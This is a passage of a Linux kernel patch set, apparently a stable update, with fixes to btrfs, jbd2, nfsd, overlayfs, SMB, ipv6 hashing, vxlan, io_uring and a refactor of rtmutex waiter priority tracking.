+ 	if (!fs_info->quota_root)
+ 		goto out;
+@@ -1314,6 +1325,7 @@ out:
+ 		btrfs_end_transaction(trans);
+ 	else if (trans)
+ 		ret = btrfs_end_transaction(trans);
++	mutex_unlock(&fs_info->cleaner_mutex);
+ 
+ 	return ret;
+ }
+diff --git a/fs/btrfs/transaction.c b/fs/btrfs/transaction.c
+index 682b463a7633a..2b776fce1c0ff 100644
+--- a/fs/btrfs/transaction.c
++++ b/fs/btrfs/transaction.c
+@@ -814,8 +814,13 @@ btrfs_attach_transaction_barrier(struct btrfs_root *root)
+ 
+ 	trans = start_transaction(root, 0, TRANS_ATTACH,
+ 				  BTRFS_RESERVE_NO_FLUSH, true);
+-	if (trans == ERR_PTR(-ENOENT))
+-		btrfs_wait_for_commit(root->fs_info, 0);
++	if (trans == ERR_PTR(-ENOENT)) {
++		int ret;
++
++		ret = btrfs_wait_for_commit(root->fs_info, 0);
++		if (ret)
++			return ERR_PTR(ret);
++	}
+ 
+ 	return trans;
+ }
+@@ -919,6 +924,7 @@ int btrfs_wait_for_commit(struct btrfs_fs_info *fs_info, u64 transid)
+ 	}
+ 
+ 	wait_for_commit(cur_trans, TRANS_STATE_COMPLETED);
++	ret = cur_trans->aborted;
+ 	btrfs_put_transaction(cur_trans);
+ out:
+ 	return ret;
+diff --git a/fs/ceph/metric.c b/fs/ceph/metric.c
+index c47347d2e84e3..9560b7bc6009a 100644
+--- a/fs/ceph/metric.c
++++ b/fs/ceph/metric.c
+@@ -208,7 +208,7 @@ static void metric_delayed_work(struct work_struct *work)
+ 	struct ceph_mds_client *mdsc =
+ 		container_of(m, struct ceph_mds_client, metric);
+ 
+-	if (mdsc->stopping)
++	if (mdsc->stopping || disable_send_metrics)
+ 		return;
+ 
+ 	if (!m->session || !check_session_state(m->session)) {
+diff --git a/fs/file.c b/fs/file.c
+index 7893ea161d770..35c62b54c9d65 100644
+--- a/fs/file.c
++++ b/fs/file.c
+@@ -1042,10 +1042,8 @@ unsigned long __fdget_pos(unsigned int fd)
+ 	struct file *file = (struct file *)(v & ~3);
+ 
+ 	if (file && (file->f_mode & FMODE_ATOMIC_POS)) {
+-		if (file_count(file) > 1) {
+-			v |= FDPUT_POS_UNLOCK;
+-			mutex_lock(&file->f_pos_lock);
+-		}
++		v |= FDPUT_POS_UNLOCK;
++		mutex_lock(&file->f_pos_lock);
+ 	}
+ 	return v;
+ }
+diff --git a/fs/jbd2/checkpoint.c b/fs/jbd2/checkpoint.c
+index 25e3c20eb19f6..c4e0da6db7195 100644
+--- a/fs/jbd2/checkpoint.c
++++ b/fs/jbd2/checkpoint.c
+@@ -221,20 +221,6 @@ restart:
+ 		jh = transaction->t_checkpoint_list;
+ 		bh = jh2bh(jh);
+ 
+-		/*
+-		 * The buffer may be writing back, or flushing out in the
+-		 * last couple of cycles, or re-adding into a new transaction,
+-		 * need to check it again until it's unlocked.
+-		 */
+-		if (buffer_locked(bh)) {
+-			get_bh(bh);
+-			spin_unlock(&journal->j_list_lock);
+-			wait_on_buffer(bh);
+-			/* the journal_head may have gone by now */
+-			BUFFER_TRACE(bh, "brelse");
+-			__brelse(bh);
+-			goto retry;
+-		}
+ 		if (jh->b_transaction != NULL) {
+ 			transaction_t *t = jh->b_transaction;
+ 			tid_t tid = t->t_tid;
+@@ -269,7 +255,22 @@ restart:
+ 			spin_lock(&journal->j_list_lock);
+ 			goto restart;
+ 		}
+-		if (!buffer_dirty(bh)) {
++		if (!trylock_buffer(bh)) {
++			/*
++			 * The buffer is locked, it may be writing back, or
++			 * flushing out in the last couple of cycles, or
++			 * re-adding into a new transaction, need to check
++			 * it again until it's unlocked.
++			 */
++			get_bh(bh);
++			spin_unlock(&journal->j_list_lock);
++			wait_on_buffer(bh);
++			/* the journal_head may have gone by now */
++			BUFFER_TRACE(bh, "brelse");
++			__brelse(bh);
++			goto retry;
++		} else if (!buffer_dirty(bh)) {
++			unlock_buffer(bh);
+ 			BUFFER_TRACE(bh, "remove from checkpoint");
+ 			/*
+ 			 * If the transaction was released or the checkpoint
+@@ -279,6 +280,7 @@ restart:
+ 			    !transaction->t_checkpoint_list)
+ 				goto out;
+ 		} else {
++			unlock_buffer(bh);
+ 			/*
+ 			 * We are about to write the buffer, it could be
+ 			 * raced by some other transaction shrink or buffer
+diff --git a/fs/nfsd/nfs4state.c b/fs/nfsd/nfs4state.c
+index 34561764e5c97..c5dc0cd6f7031 100644
+--- a/fs/nfsd/nfs4state.c
++++ b/fs/nfsd/nfs4state.c
+@@ -6269,8 +6269,6 @@ static __be32 nfsd4_validate_stateid(struct nfs4_client *cl, stateid_t *stateid)
+ 	if (ZERO_STATEID(stateid) || ONE_STATEID(stateid) ||
+ 		CLOSE_STATEID(stateid))
+ 		return status;
+-	if (!same_clid(&stateid->si_opaque.so_clid, &cl->cl_clientid))
+-		return status;
+ 	spin_lock(&cl->cl_lock);
+ 	s = find_stateid_locked(cl, stateid);
+ 	if (!s)
+diff --git a/fs/overlayfs/inode.c b/fs/overlayfs/inode.c
+index 677649b349658..c062f7e2ecb52 100644
+--- a/fs/overlayfs/inode.c
++++ b/fs/overlayfs/inode.c
+@@ -286,8 +286,8 @@ int ovl_permission(struct user_namespace *mnt_userns,
+ 	int err;
+ 
+ 	/* Careful in RCU walk mode */
+-	ovl_i_path_real(inode, &realpath);
+-	if (!realpath.dentry) {
++	realinode = ovl_i_path_real(inode, &realpath);
++	if (!realinode) {
+ 		WARN_ON(!(mask & MAY_NOT_BLOCK));
+ 		return -ECHILD;
+ 	}
+@@ -300,7 +300,6 @@ int ovl_permission(struct user_namespace *mnt_userns,
+ 	if (err)
+ 		return err;
+ 
+-	realinode = d_inode(realpath.dentry);
+ 	old_cred = ovl_override_creds(inode->i_sb);
+ 	if (!upperinode &&
+ 	    !special_file(realinode->i_mode) && mask & MAY_WRITE) {
+diff --git a/fs/proc/vmcore.c b/fs/proc/vmcore.c
+index 5aa527ca6dbe8..1ec0647a20268 100644
+--- a/fs/proc/vmcore.c
++++ b/fs/proc/vmcore.c
+@@ -132,7 +132,7 @@ ssize_t read_from_oldmem(struct iov_iter *iter, size_t count,
+ 			 u64 *ppos, bool encrypted)
+ {
+ 	unsigned long pfn, offset;
+-	size_t nr_bytes;
++	ssize_t nr_bytes;
+ 	ssize_t read = 0, tmp;
+ 	int idx;
+ 
+diff --git a/fs/smb/client/sess.c b/fs/smb/client/sess.c
+index 81be17845072a..1e3e22979604f 100644
+--- a/fs/smb/client/sess.c
++++ b/fs/smb/client/sess.c
+@@ -1014,6 +1014,7 @@ setup_ntlm_smb3_neg_ret:
+ }
+ 
+ 
++/* See MS-NLMP 2.2.1.3 */
+ int build_ntlmssp_auth_blob(unsigned char **pbuffer,
+ 					u16 *buflen,
+ 				   struct cifs_ses *ses,
+@@ -1048,7 +1049,8 @@ int build_ntlmssp_auth_blob(unsigned char **pbuffer,
+ 
+ 	flags = ses->ntlmssp->server_flags | NTLMSSP_REQUEST_TARGET |
+ 		NTLMSSP_NEGOTIATE_TARGET_INFO | NTLMSSP_NEGOTIATE_WORKSTATION_SUPPLIED;
+-
++	/* we only send version information in ntlmssp negotiate, so do not set this flag */
++	flags = flags & ~NTLMSSP_NEGOTIATE_VERSION;
+ 	tmp = *pbuffer + sizeof(AUTHENTICATE_MESSAGE);
+ 	sec_blob->NegotiateFlags = cpu_to_le32(flags);
+ 
+diff --git a/include/linux/dma-fence.h b/include/linux/dma-fence.h
+index 775cdc0b4f249..be572c3a4dcdd 100644
+--- a/include/linux/dma-fence.h
++++ b/include/linux/dma-fence.h
+@@ -584,7 +584,7 @@ static inline signed long dma_fence_wait(struct dma_fence *fence, bool intr)
+ }
+ 
+ struct dma_fence *dma_fence_get_stub(void);
+-struct dma_fence *dma_fence_allocate_private_stub(void);
++struct dma_fence *dma_fence_allocate_private_stub(ktime_t timestamp);
+ u64 dma_fence_context_alloc(unsigned num);
+ 
+ extern const struct dma_fence_ops dma_fence_array_ops;
+diff --git a/include/linux/pwm.h b/include/linux/pwm.h
+index 4de09163c968a..161e91167b9c0 100644
+--- a/include/linux/pwm.h
++++ b/include/linux/pwm.h
+@@ -478,6 +478,11 @@ static inline int pwmchip_remove(struct pwm_chip *chip)
+ 	return -EINVAL;
+ }
+ 
++static inline int devm_pwmchip_add(struct device *dev, struct pwm_chip *chip)
++{
++	return -EINVAL;
++}
++
+ static inline struct pwm_device *pwm_request_from_chip(struct pwm_chip *chip,
+ 						       unsigned int index,
+ 						       const char *label)
+diff --git a/include/net/ipv6.h b/include/net/ipv6.h
+index d383c895592a9..e4ceef687c1c2 100644
+--- a/include/net/ipv6.h
++++ b/include/net/ipv6.h
+@@ -718,12 +718,8 @@ static inline u32 ipv6_addr_hash(const struct in6_addr *a)
+ /* more secured version of ipv6_addr_hash() */
+ static inline u32 __ipv6_addr_jhash(const struct in6_addr *a, const u32 initval)
+ {
+-	u32 v = (__force u32)a->s6_addr32[0] ^ (__force u32)a->s6_addr32[1];
+-
+-	return jhash_3words(v,
+-			    (__force u32)a->s6_addr32[2],
+-			    (__force u32)a->s6_addr32[3],
+-			    initval);
++	return jhash2((__force const u32 *)a->s6_addr32,
++		      ARRAY_SIZE(a->s6_addr32), initval);
+ }
+ 
+ static inline bool ipv6_addr_loopback(const struct in6_addr *a)
+diff --git a/include/net/vxlan.h b/include/net/vxlan.h
+index bca5b01af2475..03bcc1ef0d61e 100644
+--- a/include/net/vxlan.h
++++ b/include/net/vxlan.h
+@@ -378,10 +378,15 @@ static inline netdev_features_t vxlan_features_check(struct sk_buff *skb,
+ 	return features;
+ }
+ 
+-/* IP header + UDP + VXLAN + Ethernet header */
+-#define VXLAN_HEADROOM (20 + 8 + 8 + 14)
+-/* IPv6 header + UDP + VXLAN + Ethernet header */
+-#define VXLAN6_HEADROOM (40 + 8 + 8 + 14)
++static inline int vxlan_headroom(u32 flags)
++{
++	/* VXLAN:     IP4/6 header + UDP + VXLAN + Ethernet header */
++	/* VXLAN-GPE: IP4/6 header + UDP + VXLAN */
++	return (flags & VXLAN_F_IPV6 ? sizeof(struct ipv6hdr) :
++				       sizeof(struct iphdr)) +
++	       sizeof(struct udphdr) + sizeof(struct vxlanhdr) +
++	       (flags & VXLAN_F_GPE ? 0 : ETH_HLEN);
++}
+ 
+ static inline struct vxlanhdr *vxlan_hdr(struct sk_buff *skb)
+ {
+diff --git a/include/uapi/linux/blkzoned.h b/include/uapi/linux/blkzoned.h
+index b80fcc9ea5257..f85743ef6e7d1 100644
+--- a/include/uapi/linux/blkzoned.h
++++ b/include/uapi/linux/blkzoned.h
+@@ -51,13 +51,13 @@ enum blk_zone_type {
+  *
+  * The Zone Condition state machine in the ZBC/ZAC standards maps the above
+  * deinitions as:
+- *   - ZC1: Empty         | BLK_ZONE_EMPTY
++ *   - ZC1: Empty         | BLK_ZONE_COND_EMPTY
+  *   - ZC2: Implicit Open | BLK_ZONE_COND_IMP_OPEN
+  *   - ZC3: Explicit Open | BLK_ZONE_COND_EXP_OPEN
+- *   - ZC4: Closed        | BLK_ZONE_CLOSED
+- *   - ZC5: Full          | BLK_ZONE_FULL
+- *   - ZC6: Read Only     | BLK_ZONE_READONLY
+- *   - ZC7: Offline       | BLK_ZONE_OFFLINE
++ *   - ZC4: Closed        | BLK_ZONE_COND_CLOSED
++ *   - ZC5: Full          | BLK_ZONE_COND_FULL
++ *   - ZC6: Read Only     | BLK_ZONE_COND_READONLY
++ *   - ZC7: Offline       | BLK_ZONE_COND_OFFLINE
+  *
+  * Conditions 0x5 to 0xC are reserved by the current ZBC/ZAC spec and should
+  * be considered invalid.
+diff --git a/io_uring/io_uring.c b/io_uring/io_uring.c
+index bd7b8cf8bc677..f091153bc8540 100644
+--- a/io_uring/io_uring.c
++++ b/io_uring/io_uring.c
+@@ -3477,7 +3477,7 @@ static __cold int io_uring_create(unsigned entries, struct io_uring_params *p,
+ 		ctx->syscall_iopoll = 1;
+ 
+ 	ctx->compat = in_compat_syscall();
+-	if (!capable(CAP_IPC_LOCK))
++	if (!ns_capable_noaudit(&init_user_ns, CAP_IPC_LOCK))
+ 		ctx->user = get_uid(current_user());
+ 
+ 	/*
+diff --git a/kernel/locking/rtmutex.c b/kernel/locking/rtmutex.c
+index 728f434de2bbf..21db0df0eb000 100644
+--- a/kernel/locking/rtmutex.c
++++ b/kernel/locking/rtmutex.c
+@@ -333,21 +333,43 @@ static __always_inline int __waiter_prio(struct task_struct *task)
+ 	return prio;
+ }
+ 
++/*
++ * Update the waiter->tree copy of the sort keys.
++ */
+ static __always_inline void
+ waiter_update_prio(struct rt_mutex_waiter *waiter, struct task_struct *task)
+ {
+-	waiter->prio = __waiter_prio(task);
+-	waiter->deadline = task->dl.deadline;
++	lockdep_assert_held(&waiter->lock->wait_lock);
++	lockdep_assert(RB_EMPTY_NODE(&waiter->tree.entry));
++
++	waiter->tree.prio = __waiter_prio(task);
++	waiter->tree.deadline = task->dl.deadline;
++}
++
++/*
++ * Update the waiter->pi_tree copy of the sort keys (from the tree copy).
++ */
++static __always_inline void
++waiter_clone_prio(struct rt_mutex_waiter *waiter, struct task_struct *task)
++{
++	lockdep_assert_held(&waiter->lock->wait_lock);
++	lockdep_assert_held(&task->pi_lock);
++	lockdep_assert(RB_EMPTY_NODE(&waiter->pi_tree.entry));
++
++	waiter->pi_tree.prio = waiter->tree.prio;
++	waiter->pi_tree.deadline = waiter->tree.deadline;
+ }
+ 
+ /*
+- * Only use with rt_mutex_waiter_{less,equal}()
++ * Only use with rt_waiter_node_{less,equal}()
+  */
++#define task_to_waiter_node(p)	\
++	&(struct rt_waiter_node){ .prio = __waiter_prio(p), .deadline = (p)->dl.deadline }
+ #define task_to_waiter(p)	\
+-	&(struct rt_mutex_waiter){ .prio = __waiter_prio(p), .deadline = (p)->dl.deadline }
++	&(struct rt_mutex_waiter){ .tree = *task_to_waiter_node(p) }
+ 
+-static __always_inline int rt_mutex_waiter_less(struct rt_mutex_waiter *left,
+-						struct rt_mutex_waiter *right)
++static __always_inline int rt_waiter_node_less(struct rt_waiter_node *left,
++					       struct rt_waiter_node *right)
+ {
+ 	if (left->prio < right->prio)
+ 		return 1;
+@@ -364,8 +386,8 @@ static __always_inline int rt_mutex_waiter_less(struct rt_mutex_waiter *left,
+ 	return 0;
+ }
+ 
+-static __always_inline int rt_mutex_waiter_equal(struct rt_mutex_waiter *left,
+-						 struct rt_mutex_waiter *right)
++static __always_inline int rt_waiter_node_equal(struct rt_waiter_node *left,
++						 struct rt_waiter_node *right)
+ {
+ 	if (left->prio != right->prio)
+ 		return 0;
+@@ -385,7 +407,7 @@ static __always_inline int rt_mutex_waiter_equal(struct rt_mutex_waiter *left,
+ static inline bool rt_mutex_steal(struct rt_mutex_waiter *waiter,
+ 				  struct rt_mutex_waiter *top_waiter)
+ {
+-	if (rt_mutex_waiter_less(waiter, top_waiter))
++	if (rt_waiter_node_less(&waiter->tree, &top_waiter->tree))
+ 		return true;
+ 
+ #ifdef RT_MUTEX_BUILD_SPINLOCKS
+@@ -393,30 +415,30 @@ static inline bool rt_mutex_steal(struct rt_mutex_waiter *waiter,
+ 	 * Note that RT tasks are excluded from same priority (lateral)
+ 	 * steals to prevent the introduction of an unbounded latency.
+ 	 */
+-	if (rt_prio(waiter->prio) || dl_prio(waiter->prio))
++	if (rt_prio(waiter->tree.prio) || dl_prio(waiter->tree.prio))
+ 		return false;
+ 
+-	return rt_mutex_waiter_equal(waiter, top_waiter);
++	return rt_waiter_node_equal(&waiter->tree, &top_waiter->tree);
+ #else
+ 	return false;
+ #endif
+ }
+ 
+ #define __node_2_waiter(node) \
+-	rb_entry((node), struct rt_mutex_waiter, tree_entry)
++	rb_entry((node), struct rt_mutex_waiter, tree.entry)
+ 
+ static __always_inline bool __waiter_less(struct rb_node *a, const struct rb_node *b)
+ {
+ 	struct rt_mutex_waiter *aw = __node_2_waiter(a);
+ 	struct rt_mutex_waiter *bw = __node_2_waiter(b);
+ 
+-	if (rt_mutex_waiter_less(aw, bw))
++	if (rt_waiter_node_less(&aw->tree, &bw->tree))
+ 		return 1;
+ 
+ 	if (!build_ww_mutex())
+ 		return 0;
+ 
+-	if (rt_mutex_waiter_less(bw, aw))
++	if (rt_waiter_node_less(&bw->tree, &aw->tree))
+ 		return 0;
+ 
+ 	/* NOTE: relies on waiter->ww_ctx being set before insertion */
+@@ -434,48 +456,58 @@ static __always_inline bool __waiter_less(struct rb_node *a, const struct rb_nod
+ static __always_inline void
+ rt_mutex_enqueue(struct rt_mutex_base *lock, struct rt_mutex_waiter *waiter)
+ {
+-	rb_add_cached(&waiter->tree_entry, &lock->waiters, __waiter_less);
++	lockdep_assert_held(&lock->wait_lock);
++
++	rb_add_cached(&waiter->tree.entry, &lock->waiters, __waiter_less);
+ }
+ 
+ static __always_inline void
+ rt_mutex_dequeue(struct rt_mutex_base *lock, struct rt_mutex_waiter *waiter)
+ {
+-	if (RB_EMPTY_NODE(&waiter->tree_entry))
++	lockdep_assert_held(&lock->wait_lock);
++
++	if (RB_EMPTY_NODE(&waiter->tree.entry))
+ 		return;
+ 
+-	rb_erase_cached(&waiter->tree_entry, &lock->waiters);
+-	RB_CLEAR_NODE(&waiter->tree_entry);
++	rb_erase_cached(&waiter->tree.entry, &lock->waiters);
++	RB_CLEAR_NODE(&waiter->tree.entry);
+ }
+ 
+-#define __node_2_pi_waiter(node) \
+-	rb_entry((node), struct rt_mutex_waiter, pi_tree_entry)
++#define __node_2_rt_node(node) \
++	rb_entry((node), struct rt_waiter_node, entry)
+ 
+-static __always_inline bool
+-__pi_waiter_less(struct rb_node *a, const struct rb_node *b)
++static __always_inline bool __pi_waiter_less(struct rb_node *a, const struct rb_node *b)
+ {
+-	return rt_mutex_waiter_less(__node_2_pi_waiter(a), __node_2_pi_waiter(b));
++	return rt_waiter_node_less(__node_2_rt_node(a), __node_2_rt_node(b));
+ }
+ 
+ static __always_inline void
+ rt_mutex_enqueue_pi(struct task_struct *task, struct rt_mutex_waiter *waiter)
+ {
+-	rb_add_cached(&waiter->pi_tree_entry, &task->pi_waiters, __pi_waiter_less);
++	lockdep_assert_held(&task->pi_lock);
++
++	rb_add_cached(&waiter->pi_tree.entry, &task->pi_waiters, __pi_waiter_less);
+ }
+ 
+ static __always_inline void
+ rt_mutex_dequeue_pi(struct task_struct *task, struct rt_mutex_waiter *waiter)
+ {
+-	if (RB_EMPTY_NODE(&waiter->pi_tree_entry))
++	lockdep_assert_held(&task->pi_lock);
++
++	if (RB_EMPTY_NODE(&waiter->pi_tree.entry))
+ 		return;
+ 
+-	rb_erase_cached(&waiter->pi_tree_entry, &task->pi_waiters);
+-	RB_CLEAR_NODE(&waiter->pi_tree_entry);
++	rb_erase_cached(&waiter->pi_tree.entry, &task->pi_waiters);
++	RB_CLEAR_NODE(&waiter->pi_tree.entry);
+ }
+ 
+-static __always_inline void rt_mutex_adjust_prio(struct task_struct *p)
++static __always_inline void rt_mutex_adjust_prio(struct rt_mutex_base *lock,
++						 struct task_struct *p)
+ {
+ 	struct task_struct *pi_task = NULL;
+ 
++	lockdep_assert_held(&lock->wait_lock);
++	lockdep_assert(rt_mutex_owner(lock) == p);
+ 	lockdep_assert_held(&p->pi_lock);
+ 
+ 	if (task_has_pi_waiters(p))
+@@ -571,9 +603,14 @@ static __always_inline struct rt_mutex_base *task_blocked_on_lock(struct task_st
+  * Chain walk basics and protection scope
+  *
+  * [R] refcount on task
+- * [P] task->pi_lock held
++ * [Pn] task->pi_lock held
+  * [L] rtmutex->wait_lock held
+  *
++ * Normal locking order:
++ *
++ *   rtmutex->wait_lock
++ *     task->pi_lock
++ *
+  * Step	Description				Protected by
+  *	function arguments:
+  *	@task					[R]
+@@ -588,27 +625,32 @@ static __always_inline struct rt_mutex_base *task_blocked_on_lock(struct task_st
+  *	again:
+  *	  loop_sanity_check();
+  *	retry:
+- * [1]	  lock(task->pi_lock);			[R] acquire [P]
+- * [2]	  waiter = task->pi_blocked_on;		[P]
+- * [3]	  check_exit_conditions_1();		[P]
+- * [4]	  lock = waiter->lock;			[P]
+- * [5]	  if (!try_lock(lock->wait_lock)) {	[P] try to acquire [L]
+- *	    unlock(task->pi_lock);		release [P]
++ * [1]	  lock(task->pi_lock);			[R] acquire [P1]
++ * [2]	  waiter = task->pi_blocked_on;		[P1]
++ * [3]	  check_exit_conditions_1();		[P1]
++ * [4]	  lock = waiter->lock;			[P1]
++ * [5]	  if (!try_lock(lock->wait_lock)) {	[P1] try to acquire [L]
++ *	    unlock(task->pi_lock);		release [P1]
+  *	    goto retry;
+  *	  }
+- * [6]	  check_exit_conditions_2();		[P] + [L]
+- * [7]	  requeue_lock_waiter(lock, waiter);	[P] + [L]
+- * [8]	  unlock(task->pi_lock);		release [P]
++ * [6]	  check_exit_conditions_2();		[P1] + [L]
++ * [7]	  requeue_lock_waiter(lock, waiter);	[P1] + [L]
++ * [8]	  unlock(task->pi_lock);		release [P1]
+  *	  put_task_struct(task);		release [R]
+  * [9]	  check_exit_conditions_3();		[L]
+  * [10]	  task = owner(lock);			[L]
+  *	  get_task_struct(task);		[L] acquire [R]
+- *	  lock(task->pi_lock);			[L] acquire [P]
+- * [11]	  requeue_pi_waiter(tsk, waiters(lock));[P] + [L]
+- * [12]	  check_exit_conditions_4();		[P] + [L]
+- * [13]	  unlock(task->pi_lock);		release [P]
++ *	  lock(task->pi_lock);			[L] acquire [P2]
++ * [11]	  requeue_pi_waiter(tsk, waiters(lock));[P2] + [L]
++ * [12]	  check_exit_conditions_4();		[P2] + [L]
++ * [13]	  unlock(task->pi_lock);		release [P2]
+  *	  unlock(lock->wait_lock);		release [L]
+  *	  goto again;
++ *
++ * Where P1 is the blocking task and P2 is the lock owner; going up one step
++ * the owner becomes the next blocked task etc..
++ *
++*
+  */
+ static int __sched rt_mutex_adjust_prio_chain(struct task_struct *task,
+ 					      enum rtmutex_chainwalk chwalk,
+@@ -756,7 +798,7 @@ static int __sched rt_mutex_adjust_prio_chain(struct task_struct *task,
+ 	 * enabled we continue, but stop the requeueing in the chain
+ 	 * walk.
+ 	 */
+-	if (rt_mutex_waiter_equal(waiter, task_to_waiter(task))) {
++	if (rt_waiter_node_equal(&waiter->tree, task_to_waiter_node(task))) {
+ 		if (!detect_deadlock)
+ 			goto out_unlock_pi;
+ 		else
+@@ -764,13 +806,18 @@ static int __sched rt_mutex_adjust_prio_chain(struct task_struct *task,
+ 	}
+ 
+ 	/*
+-	 * [4] Get the next lock
++	 * [4] Get the next lock; per holding task->pi_lock we can't unblock
++	 * and guarantee @lock's existence.
+ 	 */
+ 	lock = waiter->lock;
+ 	/*
+ 	 * [5] We need to trylock here as we are holding task->pi_lock,
+ 	 * which is the reverse lock order versus the other rtmutex
+ 	 * operations.
++	 *
++	 * Per the above, holding task->pi_lock guarantees lock exists, so
++	 * inverting this lock order is infeasible from a life-time
++	 * perspective.
+ 	 */
+ 	if (!raw_spin_trylock(&lock->wait_lock)) {
+ 		raw_spin_unlock_irq(&task->pi_lock);
+@@ -874,17 +921,18 @@ static int __sched rt_mutex_adjust_prio_chain(struct task_struct *task,
+ 	 * or
+ 	 *
+ 	 *   DL CBS enforcement advancing the effective deadline.
+-	 *
+-	 * Even though pi_waiters also uses these fields, and that tree is only
+-	 * updated in [11], we can do this here, since we hold [L], which
+-	 * serializes all pi_waiters access and rb_erase() does not care about
+-	 * the values of the node being removed.
+ 	 */
+ 	waiter_update_prio(waiter, task);
+ 
+ 	rt_mutex_enqueue(lock, waiter);
+ 
+-	/* [8] Release the task */
++	/*
++	 * [8] Release the (blocking) task in preparation for
++	 * taking the owner task in [10].
++	 *
++	 * Since we hold lock->waiter_lock, task cannot unblock, even if we
++	 * release task->pi_lock.
++	 */
+ 	raw_spin_unlock(&task->pi_lock);
+ 	put_task_struct(task);
+ 
+@@ -908,7 +956,12 @@ static int __sched rt_mutex_adjust_prio_chain(struct task_struct *task,
+ 		return 0;
+ 	}
+ 
+-	/* [10] Grab the next task, i.e. the owner of @lock */
++	/*
++	 * [10] Grab the next task, i.e. the owner of @lock
++	 *
++	 * Per holding lock->wait_lock and checking for !owner above, there
++	 * must be an owner and it cannot go away.
++	 */
+ 	task = get_task_struct(rt_mutex_owner(lock));
+ 	raw_spin_lock(&task->pi_lock);
+ 
+@@ -921,8 +974,9 @@ static int __sched rt_mutex_adjust_prio_chain(struct task_struct *task,
+ 		 * and adjust the priority of the owner.
+ 		 */
+ 		rt_mutex_dequeue_pi(task, prerequeue_top_waiter);
++		waiter_clone_prio(waiter, task);
+ 		rt_mutex_enqueue_pi(task, waiter);
+-		rt_mutex_adjust_prio(task);
++		rt_mutex_adjust_prio(lock, task);
+ 
+ 	} else if (prerequeue_top_waiter == waiter) {
+ 		/*
+@@ -937,8 +991,9 @@ static int __sched rt_mutex_adjust_prio_chain(struct task_struct *task,
+ 		 */
+ 		rt_mutex_dequeue_pi(task, waiter);
+ 		waiter = rt_mutex_top_waiter(lock);
++		waiter_clone_prio(waiter, task);
+ 		rt_mutex_enqueue_pi(task, waiter);
+-		rt_mutex_adjust_prio(task);
++		rt_mutex_adjust_prio(lock, task);
+ 	} else {
+ 		/*
+ 		 * Nothing changed. No need to do any priority
+@@ -1154,6 +1209,7 @@ static int __sched task_blocks_on_rt_mutex(struct rt_mutex_base *lock,
+ 	waiter->task = task;
+ 	waiter->lock = lock;
+ 	waiter_update_prio(waiter, task);
++	waiter_clone_prio(waiter, task);
+ 
+ 	/* Get the top priority waiter on the lock */
+ 	if (rt_mutex_has_waiters(lock))
+@@ -1187,7 +1243,7 @@ static int __sched task_blocks_on_rt_mutex(struct rt_mutex_base *lock,
+ 		rt_mutex_dequeue_pi(owner, top_waiter);
+ 		rt_mutex_enqueue_pi(owner, waiter);
+ 
+-		rt_mutex_adjust_prio(owner);
++		rt_mutex_adjust_prio(lock, owner);
+ 		if (owner->pi_blocked_on)
+ 			chain_walk = 1;
+ 	} else if (rt_mutex_cond_detect_deadlock(waiter, chwalk)) {
+@@ -1234,6 +1290,8 @@ static void __sched mark_wakeup_next_waiter(struct rt_wake_q_head *wqh,
+ {
+ 	struct rt_mutex_waiter *waiter;
+ 
++	lockdep_assert_held(&lock->wait_lock);
++
+ 	raw_spin_lock(&current->pi_lock);
+ 
+ 	waiter = rt_mutex_top_waiter(lock);
+@@ -1246,7 +1304,7 @@ static void __sched mark_wakeup_next_waiter(struct rt_wake_q_head *wqh,
+ 	 * task unblocks.
+ 	 */
+ 	rt_mutex_dequeue_pi(current, waiter);
+-	rt_mutex_adjust_prio(current);
++	rt_mutex_adjust_prio(lock, current);
+ 
+ 	/*
+ 	 * As we are waking up the top waiter, and the waiter stays
+@@ -1482,7 +1540,7 @@ static void __sched remove_waiter(struct rt_mutex_base *lock,
+ 	if (rt_mutex_has_waiters(lock))
+ 		rt_mutex_enqueue_pi(owner, rt_mutex_top_waiter(lock));
+ 
+-	rt_mutex_adjust_prio(owner);
++	rt_mutex_adjust_prio(lock, owner);
+ 
+ 	/* Store the lock on which owner is blocked or NULL */
+ 	next_lock = task_blocked_on_lock(owner);
+diff --git a/kernel/locking/rtmutex_api.c b/kernel/locking/rtmutex_api.c
+index cb9fdff76a8a3..a6974d0445930 100644
+--- a/kernel/locking/rtmutex_api.c
++++ b/kernel/locking/rtmutex_api.c
+@@ -459,7 +459,7 @@ void __sched rt_mutex_adjust_pi(struct task_struct *task)
+ 	raw_spin_lock_irqsave(&task->pi_lock, flags);
+ 
+ 	waiter = task->pi_blocked_on;
+-	if (!waiter || rt_mutex_waiter_equal(waiter, task_to_waiter(task))) {
++	if (!waiter || rt_waiter_node_equal(&waiter->tree, task_to_waiter_node(task))) {
+ 		raw_spin_unlock_irqrestore(&task->pi_lock, flags);
+ 		return;
+ 	}
+diff --git a/kernel/locking/rtmutex_common.h b/kernel/locking/rtmutex_common.h
+index c47e8361bfb5c..1162e07cdaea1 100644
+--- a/kernel/locking/rtmutex_common.h
++++ b/kernel/locking/rtmutex_common.h
+@@ -17,27 +17,44 @@
+ #include <linux/rtmutex.h>
+ #include <linux/sched/wake_q.h>
+ 
++
++/*
++ * This is a helper for the struct rt_mutex_waiter below. A waiter goes in two
++ * separate trees and they need their own copy of the sort keys because of
++ * different locking requirements.
++ *
++ * @entry:		rbtree node to enqueue into the waiters tree
++ * @prio:		Priority of the waiter
++ * @deadline:		Deadline of the waiter if applicable
++ *
++ * See rt_waiter_node_less() and waiter_*_prio().
++ */
++struct rt_waiter_node {
++	struct rb_node	entry;
++	int		prio;
++	u64		deadline;
++};
++
+ /*
+  * This is the control structure for tasks blocked on a rt_mutex,
+  * which is allocated on the kernel stack on of the blocked task.
+  *
+- * @tree_entry:		pi node to enqueue into the mutex waiters tree
+- * @pi_tree_entry:	pi node to enqueue into the mutex owner waiters tree
++ * @tree:		node to enqueue into the mutex waiters tree
++ * @pi_tree:		node to enqueue into the mutex owner waiters tree
+  * @task:		task reference to the blocked task
+  * @lock:		Pointer to the rt_mutex on which the waiter blocks
+  * @wake_state:		Wakeup state to use (TASK_NORMAL or TASK_RTLOCK_WAIT)
+- * @prio:		Priority of the waiter
+- * @deadline:		Deadline of the waiter if applicable
+  * @ww_ctx:		WW context pointer
++ *
++ * @tree is ordered by @lock->wait_lock
++ * @pi_tree is ordered by rt_mutex_owner(@lock)->pi_lock
+  */
+ struct rt_mutex_waiter {
+-	struct rb_node		tree_entry;
+-	struct rb_node		pi_tree_entry;
++	struct rt_waiter_node	tree;
++	struct rt_waiter_node	pi_tree;
+ 	struct task_struct	*task;
+ 	struct rt_mutex_base	*lock;
+ 	unsigned int		wake_state;
+-	int			prio;
+-	u64			deadline;
+ 	struct ww_acquire_ctx	*ww_ctx;
+ };
+ 
